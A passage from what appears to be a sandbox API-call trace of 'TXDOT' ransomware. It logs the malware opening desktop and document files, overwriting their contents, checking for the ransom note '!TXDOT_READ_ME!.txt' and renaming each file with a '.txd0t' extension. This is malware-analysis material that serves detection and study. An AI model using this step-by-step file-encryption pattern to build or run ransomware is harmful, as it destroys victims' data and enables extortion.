lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x37d0, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x37d0, lpOverlapped=0x0) returned 1 [0073.877] FlushFileBuffers (hFile=0x47c) returned 1 [0073.885] GetProcessHeap () returned 0xe30000 [0073.885] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf2) returned 0xe9d750 [0073.885] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif" [0073.885] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif") returned="Vn Oo.gif" [0073.885] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.885] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.886] GetProcessHeap () returned 0xe30000 [0073.886] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.886] CloseHandle (hObject=0x47c) returned 1 [0073.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\vn oo.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\vn oo.gif.txd0t")) returned 1 [0073.887] SetEvent (hEvent=0x414) returned 1 [0073.887] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.892] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav" [0073.892] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t" [0073.892] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t") returned 0 [0073.892] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav", dwFileAttributes=0x80) returned 1 [0073.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wo3yp7g6h.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.892] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=6091) returned 1 [0073.894] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.894] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.894] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffe635, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.895] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x17c0, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x17c0, lpOverlapped=0x0) returned 1 [0073.895] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffe840, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.895] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x17c0, lpOverlapped=0x0) returned 1 [0073.895] FlushFileBuffers (hFile=0x46c) returned 1 [0073.901] GetProcessHeap () returned 0xe30000 [0073.901] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfa) returned 0xecf498 [0073.902] StrCpyW (in: psz1=0xecf498, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav" [0073.902] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav") returned="wO3YP7g6H.wav" [0073.902] StrCpyW (in: psz1=0xecf4d0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.902] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.902] GetProcessHeap () returned 0xe30000 [0073.902] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf498 | out: hHeap=0xe30000) returned 1 [0073.902] CloseHandle (hObject=0x46c) returned 1 [0073.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wo3yp7g6h.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\wo3yp7g6h.wav.txd0t")) returned 1 [0073.904] SetEvent (hEvent=0x414) returned 1 [0073.904] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.908] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif" [0073.908] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif.txd0t" [0073.908] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif.txd0t") returned 0 [0073.908] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif", dwFileAttributes=0x80) returned 1 [0073.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\zau1_q_6pwntc.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0073.908] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=48180) returned 1 [0073.908] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.909] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.909] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff41cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.909] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xbc30, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0xbc30, lpOverlapped=0x0) returned 1 [0073.910] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff43d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.910] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xbc30, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0xbc30, lpOverlapped=0x0) returned 1 [0073.910] FlushFileBuffers (hFile=0x47c) returned 1 [0073.915] GetProcessHeap () returned 0xe30000 [0073.915] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0073.915] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif" [0073.915] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif") returned="Zau1_Q_6PWntC.gif" [0073.915] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.915] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.915] GetProcessHeap () returned 0xe30000 [0073.916] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.916] CloseHandle (hObject=0x47c) returned 1 [0073.917] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\zau1_q_6pwntc.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\zau1_q_6pwntc.gif.txd0t")) returned 1 [0073.918] SetEvent (hEvent=0x414) returned 1 [0073.918] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.926] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv" [0073.926] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv.txd0t" [0073.926] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv.txd0t") returned 0 [0073.927] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv", dwFileAttributes=0x80) returned 1 [0073.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ztt1zuqohsnyloxvx2_e.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0073.927] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=36655) returned 1 [0073.927] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.927] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.928] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff6ed1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.928] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x8f20, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x8f20, lpOverlapped=0x0) returned 1 [0073.929] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff70e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.929] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x8f20, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x8f20, lpOverlapped=0x0) returned 1 [0073.929] FlushFileBuffers (hFile=0x47c) returned 1 [0073.935] GetProcessHeap () returned 0xe30000 [0073.935] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2be8 [0073.935] StrCpyW (in: psz1=0xed2be8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv" [0073.935] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv") returned="ztT1zUqOHSnYLoXvx2_E.csv" [0073.935] StrCpyW (in: psz1=0xed2c20, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.935] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.935] GetProcessHeap () returned 0xe30000 [0073.935] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2be8 | out: hHeap=0xe30000) returned 1 [0073.935] CloseHandle (hObject=0x47c) returned 1 [0073.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ztt1zuqohsnyloxvx2_e.csv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\ztt1zuqohsnyloxvx2_e.csv.txd0t")) returned 1 [0073.937] SetEvent (hEvent=0x414) returned 1 [0073.937] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.943] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx" [0073.944] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t" [0073.944] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t") returned 0 [0073.944] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx", dwFileAttributes=0x80) returned 1 [0073.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\1wqmaykdv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.944] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=62407) returned 1 [0073.944] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.945] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.945] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff0a39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.945] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xf3c0, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0xf3c0, lpOverlapped=0x0) returned 1 [0073.947] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff0c40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.947] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xf3c0, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0xf3c0, lpOverlapped=0x0) returned 1 [0073.947] FlushFileBuffers (hFile=0x46c) returned 1 [0073.952] GetProcessHeap () returned 0xe30000 [0073.952] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecf180 [0073.952] StrCpyW (in: psz1=0xecf180, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx" [0073.952] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx") returned="1WQmayKDv.pptx" [0073.952] StrCpyW (in: psz1=0xecf1bc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.952] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0073.952] GetProcessHeap () returned 0xe30000 [0073.952] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf180 | out: hHeap=0xe30000) returned 1 [0073.952] CloseHandle (hObject=0x46c) returned 1 [0073.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\1wqmaykdv.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\1wqmaykdv.pptx.txd0t")) returned 1 [0073.956] SetEvent (hEvent=0x414) returned 1 [0073.956] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.958] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx" [0073.959] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t" [0073.959] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t") returned 0 [0073.959] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx", dwFileAttributes=0x80) returned 1 [0073.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx" (normalized: "c:\\users\\fd1hvy\\documents\\27kj6w0qcamgpnm.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.959] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=100963) returned 1 [0073.959] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.959] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.960] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe739d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.960] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x18a60, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x18a60, lpOverlapped=0x0) returned 1 [0073.962] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe75a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.962] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x18a60, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x18a60, lpOverlapped=0x0) returned 1 [0073.962] FlushFileBuffers (hFile=0x46c) returned 1 [0073.969] GetProcessHeap () returned 0xe30000 [0073.969] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed2328 [0073.969] StrCpyW (in: psz1=0xed2328, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx" [0073.969] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx") returned="27kj6w0qCAmGPNM.docx" [0073.969] StrCpyW (in: psz1=0xed2364, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.969] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0073.969] GetProcessHeap () returned 0xe30000 [0073.969] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2328 | out: hHeap=0xe30000) returned 1 [0073.969] CloseHandle (hObject=0x46c) returned 1 [0073.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx" (normalized: "c:\\users\\fd1hvy\\documents\\27kj6w0qcamgpnm.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\27kj6w0qcamgpnm.docx.txd0t")) returned 1 [0073.972] SetEvent (hEvent=0x414) returned 1 [0073.972] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.978] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt" [0073.978] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t" [0073.978] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t") returned 0 [0073.979] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt", dwFileAttributes=0x80) returned 1 [0073.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\6iklp7h.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0073.979] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=24130) returned 1 [0073.979] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.979] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.980] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff9fbe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.980] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x5e40, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x5e40, lpOverlapped=0x0) returned 1 [0073.981] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffa1c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.981] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x5e40, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x5e40, lpOverlapped=0x0) returned 1 [0073.981] FlushFileBuffers (hFile=0x47c) returned 1 [0073.997] GetProcessHeap () returned 0xe30000 [0073.997] 